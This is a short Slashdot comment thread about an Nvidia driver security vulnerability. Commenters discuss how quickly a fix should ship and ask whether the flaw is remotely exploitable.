It appears that this has been known to Nvidia for at least a month.

At normal software companies this would probably go through a process like:
1) Confirmation of the problem
2) Determine severity
3) Assign a release to fix it by
4) Have someone fix it
5) Verify the fix
6) Ship it with the next release
In addition, one may want to look around for related problems and fix those too. Since it is a security issue, I would hope that a fix makes it into the next driver release AFTER the one that is in process. Or perhaps hurried into the one that is in process if it won't delay too long. I don't think a month is really that long for a company that size to go without a fix. Upon reading the summary I honestly thought the last word was going to be "year" not "month", in which case a fix would be long overdue.

Is this vulnerability remotely exploitable? (0)

Anonymous Coward | about 2 years ago | (#40846807)

I guess this is the most important question, otherwise users shouldn't worry about it. Does anybody know?

Load More Comments
Slashdot Account

Need an Account?

Forgot your password?

Don't worry, we never post anything without your permission.

Submission Text Formatting Tips

We support a small subset of HTML, namely these tags:

  • b
  • i
  • p
  • br
  • a
  • ol
  • ul
  • li
  • dl
  • dt
  • dd
  • em
  • strong
  • tt
  • blockquote
  • div
  • quote
  • ecode

"ecode" can be used for code snippets, for example:

<ecode>    while(1) { do_something(); } </ecode>
Create a Slashdot Account

Loading...